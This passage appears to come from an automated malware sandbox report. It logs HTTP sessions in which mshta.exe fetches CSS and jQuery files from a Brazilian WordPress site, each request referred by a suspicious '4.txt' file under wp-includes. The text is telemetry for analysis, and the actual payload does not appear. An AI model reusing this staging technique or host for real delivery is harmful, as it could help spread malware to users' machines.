                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:42.541024923 CEST361INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:42 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 10 Aug 2021 23:54:20 GMT
                                        ETag: "a50de6-2b5-5c93d38685a84"
                                        Accept-Ranges: bytes
                                        Content-Length: 693
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 61 2e 67 66 6c 61 67 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 70 61 64 64 69 6e 67 3a 31 70 78 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 32 34 2e 70 6e 67 29 3b 7d 0a 61 2e 67 66 6c 61 67 20 69 6d 67 20 7b 62 6f 72 64 65 72 3a 30 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 7d 0a 61 2e 67 66 6c 61 67 3a 68 6f 76 65 72 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 32 34 61 2e 70 6e 67 29 3b 7d 0a 69 6d 67 2e 67 73 74 61 74 73 20 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 0a 61 2e 61 6c 74 5f 66 6c 61 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 61 6c 74 5f 66 6c 61 67 73 2e 70 6e 67 29 3b 7d 0a 61 2e 61 6c 74 5f 66 6c 61 67 3a 68 6f 76 65 72 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 61 6c 74 5f 66 6c 61 67 73 61 2e 70 6e 67 29 3b 7d 0a 61 2e 75 73 5f 66 6c 61 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 30 70 78 20 2d 31 30 30 70 78 3b 7d 0a 61 2e 62 72 5f 66 6c 61 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 30 30 70 78 20 2d 31 30 30 70 78 3b 7d 0a 61 2e 6d 78 5f 66 6c 61 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 30 30 70 78 20 2d 31 30 30 70 78 3b 7d 0a 0a 61 2e 67 6c 69 6e 6b 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 0a 61 2e 67 6c 69 6e 6b 20 73 70 61 6e 20 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 7d 0a 61 2e 67 6c 69 6e 6b 20 69 6d 67 20 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 62 6f 72 64 65 72 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6f 70 61 63 69 74 79 3a 30 2e 38 3b 7d 0a 61 2e 67 6c 69 6e 6b 3a 68 6f 76 65 72 20 69 6d 67 20 7b 6f 70 61 63 69 74 79 3a 31 3b 7d
                                        Data Ascii: a.gflag {font-size:24px;padding:1px 0;background-repeat:no-repeat;background-image:url(24.png);}a.gflag img {border:0;height:24px;display:inline;}a.gflag:hover {background-image:url(24a.png);}img.gstats {display:none;}a.alt_flag {background-image:url(alt_flags.png);}a.alt_flag:hover {background-image:url(alt_flagsa.png);}a.us_flag {background-position:-0px -100px;}a.br_flag {background-position:-100px -100px;}a.mx_flag {background-position:-200px -100px;}a.glink {text-decoration:none;}a.glink span {margin-right:5px;font-size:15px;vertical-align:middle;}a.glink img {vertical-align:middle;display:inline;border:0;padding:0;margin:0;opacity:0.8;}a.glink:hover img {opacity:1;}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        20192.168.2.2249195187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:48.893317938 CEST782OUTGET /wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.css?ver=1.5.8 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:49.130405903 CEST819INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:48 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:26:49 GMT
                                        ETag: "a514fe-3b24-58592cb795840"
                                        Accept-Ranges: bytes
                                        Content-Length: 15140
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 2e 6d 70 2d 72 6f 77 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 30 70 78 3b 2a 7a 6f 6f 6d 3a 31 7d 2e 6d 70 2d 72 6f 77 3a 62 65 66 6f 72 65 2c 2e 6d 70 2d 72 6f 77 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 6d 70 2d 72 6f 77 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 5b 63 6c 61 73 73 2a 3d 22 6d 70 2d 73 70 61 6e 22 5d 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 7d 2e 6d 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 39 34 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 31 32 7b 77 69 64 74 68 3a 39 34 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 31 31 7b 77 69 64 74 68 3a 38 36 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 31 30 7b 77 69 64 74 68 3a 37 38 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 39 7b 77 69 64 74 68 3a 37 30 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 38 7b 77 69 64 74 68 3a 36 32 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 37 7b 77 69 64 74 68 3a 35 34 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 36 7b 77 69 64 74 68 3a 34 36 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 35 7b 77 69 64 74 68 3a 33 38 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 34 7b 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 33 7b 77 69 64 74 68 3a 32 32 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 32 7b 77 69 64 74 68 3a 31 34 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 31 7b 77 69 64 74 68 3a 36 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 31 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 38 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 30 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 32 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 34 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 32 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 34 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 36 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 38 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 30 70 78 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 7b 77 69 64 74 68 3a 31 30 30 25 3b 2a 7a 6f 6f 6d 3a 31 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 3a 62 65 66 6f 72 65 2c 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 20 5b 63 6c 61 73 73 2a 3d 22 6d 70 2d 73 70 61 6e
                                        Data Ascii: .mp-row{margin-left:-20px;*zoom:1}.mp-row:before,.mp-row:after{display:table;content:"";line-height:0}.mp-row:after{clear:both}[class*="mp-span"]{float:left;min-height:1px;margin-left:20px}.mp-container{width:940px}.mp-span12{width:940px}.mp-span11{width:860px}.mp-span10{width:780px}.mp-span9{width:700px}.mp-span8{width:620px}.mp-span7{width:540px}.mp-span6{width:460px}.mp-span5{width:380px}.mp-span4{width:300px}.mp-span3{width:220px}.mp-span2{width:140px}.mp-span1{width:60px}.mp-offset12{margin-left:980px}.mp-offset11{margin-left:900px}.mp-offset10{margin-left:820px}.mp-offset9{margin-left:740px}.mp-offset8{margin-left:660px}.mp-offset7{margin-left:580px}.mp-offset6{margin-left:500px}.mp-offset5{margin-left:420px}.mp-offset4{margin-left:340px}.mp-offset3{margin-left:260px}.mp-offset2{margin-left:180px}.mp-offset1{margin-left:100px}.mp-row-fluid{width:100%;*zoom:1;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.mp-row-fluid:before,.mp-row-fluid:after{display:table;content:"";line-height:0}.mp-row-fluid:after{clear:both}.mp-row-fluid [class*="mp-span
                                        Aug 16, 2022 10:48:49.130434990 CEST820INData Raw: 22 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78
                                        Data Ascii: "]{display:block;width:100%;min-height:30px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;float:left;margin-left:2.127659574468085%;*margin-left:2.074468085106383%}.mp-row-fluid [class*="mp-span"]:first-child{m
                                        Aug 16, 2022 10:48:49.130460024 CEST822INData Raw: 39 35 37 34 34 36 37 25 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 20 2e 6d 70 2d 6f 66 66 73 65 74 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 35 2e 37 34 34 36 38 30 38 35 31 30 36 33 38 32 25 3b 2a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 35
                                        Data Ascii: 9574467%}.mp-row-fluid .mp-offset11{margin-left:95.74468085106382%;*margin-left:95.6382978723404%}.mp-row-fluid .mp-offset11:first-child{margin-left:93.61702127659574%;*margin-left:93.51063829787232%}.mp-row-fluid .mp-offset10{margin-left:87.2
                                        Aug 16, 2022 10:48:49.130486965 CEST823INData Raw: 33 25 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 20 2e 6d 70 2d 6f 66 66 73 65 74 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 36 2e 31 37 30 32 31 32 37 36 35 39 35 37 34 34 34 25 3b 2a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 36 2e 30 36 33 38 32
                                        Data Ascii: 3%}.mp-row-fluid .mp-offset4{margin-left:36.170212765957444%;*margin-left:36.06382978723405%}.mp-row-fluid .mp-offset4:first-child{margin-left:34.04255319148936%;*margin-left:33.93617021276596%}.mp-row-fluid .mp-offset3{margin-left:27.65957446
                                        Aug 16, 2022 10:48:49.130548000 CEST824INData Raw: 69 6e 67 3a 30 7d 2e 6d 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 70 2d 72 6f 77 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 5b 63 6c 61
                                        Data Ascii: ing:0}.mp-container{width:auto}.mp-row-fluid{width:100%}.mp-row{margin-left:0}[class*="mp-span"],.mp-row-fluid [class*="mp-span"]{float:none;display:block;width:100%;margin-left:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-si
                                        Aug 16, 2022 10:48:49.130578041 CEST826INData Raw: 6c 75 69 64 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e
                                        Data Ascii: luid:after{display:table;content:"";line-height:0}.mp-row-fluid:after{clear:both}.mp-row-fluid [class*="mp-span"]{display:block;width:100%;min-height:30px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;float:lef
                                        Aug 16, 2022 10:48:49.130600929 CEST827INData Raw: 37 38 38 39 39 37 32 39 36 32 25 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 20 2e 6d 70 2d 6f 66 66 73 65 74 31 32 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 32 2e 37 36 32 34 33 30 39 33 39 32 32 36 35 32 25
                                        Data Ascii: 7889972962%}.mp-row-fluid .mp-offset12:first-child{margin-left:102.76243093922652%;*margin-left:102.6560479605031%}.mp-row-fluid .mp-offset11{margin-left:96.96132596685082%;*margin-left:96.8549429881274%}.mp-row-fluid .mp-offset11:first-child{
                                        Aug 16, 2022 10:48:49.130626917 CEST829INData Raw: 35 31 34 31 37 25 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 20 2e 6d 70 2d 6f 66 66 73 65 74 35 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 32 2e 38 31 37 36 37 39 35 35 38 30 31 31 30 35 25 3b 2a 6d 61 72 67 69
                                        Data Ascii: 51417%}.mp-row-fluid .mp-offset5:first-child{margin-left:42.81767955801105%;*margin-left:42.71129657928765%}.mp-row-fluid .mp-offset4{margin-left:37.01657458563536%;*margin-left:36.91019160691196%}.mp-row-fluid .mp-offset4:first-child{margin-l
                                        Aug 16, 2022 10:48:49.130655050 CEST830INData Raw: 2e 6d 70 2d 73 70 61 6e 32 7b 77 69 64 74 68 3a 31 37 30 70 78 7d 2e 6d 70 2d 73 70 61 6e 31 7b 77 69 64 74 68 3a 37 30 70 78 7d 2e 6d 70 2d 6f 66 66 73 65 74 31 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 32 33 30 70 78 7d 2e 6d 70 2d 6f 66 66
                                        Data Ascii: .mp-span2{width:170px}.mp-span1{width:70px}.mp-offset12{margin-left:1230px}.mp-offset11{margin-left:1130px}.mp-offset10{margin-left:1030px}.mp-offset9{margin-left:930px}.mp-offset8{margin-left:830px}.mp-offset7{margin-left:730px}.mp-offset6{ma
                                        Aug 16, 2022 10:48:49.130681992 CEST831INData Raw: 36 36 34 37 35 37 32 32 38 35 38 37 30 31 34 25 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 20 2e 6d 70 2d 73 70 61 6e 35 7b 77 69 64 74 68 3a 34 30 2e 31 37 30 39 34 30 31 37 30 39 34 30 31 37 25 3b 2a 77 69 64 74 68 3a 34 30 2e 31 31 37 37 34 38
                                        Data Ascii: 664757228587014%}.mp-row-fluid .mp-span5{width:40.17094017094017%;*width:40.11774868157847%}.mp-row-fluid .mp-span4{width:31.623931623931625%;*width:31.570740134569924%}.mp-row-fluid .mp-span3{width:23.076923076923077%;*width:23.02373158756137
                                        Aug 16, 2022 10:48:49.362467051 CEST847INData Raw: 36 38 2e 32 36 39 36 38 35 33 39 37 33 34 34 39 37 25 7d 2e 6d 70 2d 72 6f 77 2d 66 6c 75 69 64 20 2e 6d 70 2d 6f 66 66 73 65 74 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 32 2e 33 39 33 31 36 32 33 39 33 31 36 32 33 38 35 25 3b 2a 6d 61 72 67
                                        Data Ascii: 68.26968539734497%}.mp-row-fluid .mp-offset7{margin-left:62.393162393162385%;*margin-left:62.28677941443899%}.mp-row-fluid .mp-offset7:first-child{margin-left:59.82905982905982%;*margin-left:59.72267685033642%}.mp-row-fluid .mp-offset6{margin-


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        21192.168.2.2249196187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:49.117939949 CEST817OUTGET /wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:49.334096909 CEST833INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:34 GMT
                                        Server: Apache
                                        ETag: "a534c3-17278-58592d497f080"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:22 GMT
                                        Content-Length: 94840
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15664473 21187662
                                        Age: 75
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 37 2e 32 20 6a 71 75 65 72 79 2e 63 6f 6d 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 63 79 28 61 29 7b 72 65 74 75 72 6e 20 66 2e 69 73 57 69 6e 64 6f 77 28 61 29 3f 61 3a 61 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 39 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 61 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 63 75 28 61 29 7b 69 66 28 21 63 6a 5b 61 5d 29 7b 76 61 72 20 62 3d 63 2e 62 6f 64 79 2c 64 3d 66 28 22 3c 22 2b 61 2b 22 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 62 29 2c 65 3d 64 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 29 3b 64 2e 72 65 6d 6f 76 65 28 29 3b 69 66 28 65 3d 3d 3d 22 6e 6f 6e 65 22 7c 7c 65 3d 3d 3d 22 22 29 7b 63 6b 7c 7c 28 63 6b 3d 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 2c 63 6b 2e 66 72 61 6d 65 42 6f 72 64 65 72 3d 63 6b 2e 77 69 64 74 68 3d 63 6b 2e 68 65 69 67 68 74 3d 30 29 2c 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 6b 29 3b 69 66 28 21 63 6c 7c 7c 21 63 6b 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 63 6c 3d 28 63 6b 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 7c 7c 63 6b 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 2e 64 6f 63 75 6d 65 6e 74 2c 63 6c 2e 77 72 69 74 65 28 28 66 2e 73 75 70 70 6f 72 74 2e 62 6f 78 4d 6f 64 65 6c 3f 22 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 22 3a 22 22 29 2b 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 22 29 2c 63 6c 2e 63 6c 6f 73 65 28 29 3b 64 3d 63 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 29 2c 63 6c 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 2c 65 3d 66 2e 63 73 73 28 64 2c 22 64 69 73 70 6c 61 79 22 29 2c 62 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 63 6b 29 7d 63 6a 5b 61 5d 3d 65 7d 72 65 74 75 72 6e 20 63 6a 5b 61 5d 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 61 2c 62 29 7b 76 61 72 20 63 3d 7b 7d 3b 66 2e 65 61 63 68 28 63 70 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 63 70 2e 73 6c 69 63 65 28 30 2c 62 29 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 5b 74 68 69 73 5d 3d 61 7d 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 63 73 28 29 7b 63 71 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 63 72 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 63 73 2c 30 29 3b 72 65 74 75 72 6e 20 63 71 3d 66 2e 6e 6f 77 28 29 7d 66 75 6e 63 74 69 6f 6e 20 63 69 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 61 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 7d 63 61 74 63 68 28 62 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 68 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 61 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 62 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 62 28 61 2c 63 29 7b 61 2e 64 61 74 61
                                        Data Ascii: /*! jQuery v1.7.2 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.data
                                        Aug 16, 2022 10:48:49.334120989 CEST834INData Raw: 46 69 6c 74 65 72 26 26 28 63 3d 61 2e 64 61 74 61 46 69 6c 74 65 72 28 63 2c 61 2e 64 61 74 61 54 79 70 65 29 29 3b 76 61 72 20 64 3d 61 2e 64 61 74 61 54 79 70 65 73 2c 65 3d 7b 7d 2c 67 2c 68 2c 69 3d 64 2e 6c 65 6e 67 74 68 2c 6a 2c 6b 3d 64
                                        Data Ascii: Filter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&
                                        Aug 16, 2022 10:48:49.334144115 CEST836INData Raw: 53 2c 6c 3b 66 6f 72 28 3b 69 3c 6a 26 26 28 6b 7c 7c 21 6c 29 3b 69 2b 2b 29 6c 3d 68 5b 69 5d 28 63 2c 64 2c 65 29 2c 74 79 70 65 6f 66 20 6c 3d 3d 22 73 74 72 69 6e 67 22 26 26 28 21 6b 7c 7c 67 5b 6c 5d 3f 6c 3d 62 3a 28 63 2e 64 61 74 61 54
                                        Data Ascii: S,l;for(;i<j&&(k||!l);i++)l=h[i](c,d,e),typeof l=="string"&&(!k||g[l]?l=b:(c.dataTypes.unshift(l),l=bZ(a,c,d,e,l,g)));(k||!l)&&!g["*"]&&(l=bZ(a,c,d,e,"*",g));return l}function bY(a){return function(b,c){typeof b!="string"&&(c=b,b="*");if(f.isF
                                        Aug 16, 2022 10:48:49.334168911 CEST837INData Raw: 6f 6e 20 62 6c 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28
                                        Data Ascii: on bl(a){return typeof a.getElementsByTagName!="undefined"?a.getElementsByTagName("*"):typeof a.querySelectorAll!="undefined"?a.querySelectorAll("*"):[]}function bk(a,b){var c;b.nodeType===1&&(b.clearAttributes&&b.clearAttributes(),b.mergeAttr
                                        Aug 16, 2022 10:48:49.334193945 CEST838INData Raw: 20 65 3d 3d 3d 63 7d 29 3b 69 66 28 62 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 20 66 2e 67 72 65 70 28 61 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 64 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 3d 3d 3d 63 7d 29 3b 69 66 28 74 79 70 65 6f 66 20
                                        Data Ascii: e===c});if(b.nodeType)return f.grep(a,function(a,d){return a===b===c});if(typeof b=="string"){var d=f.grep(a,function(a){return a.nodeType===1});if(O.test(b))return f.filter(b,d,!c);b=f.filter(b,d)}return f.grep(a,function(a,d){return f.inArr
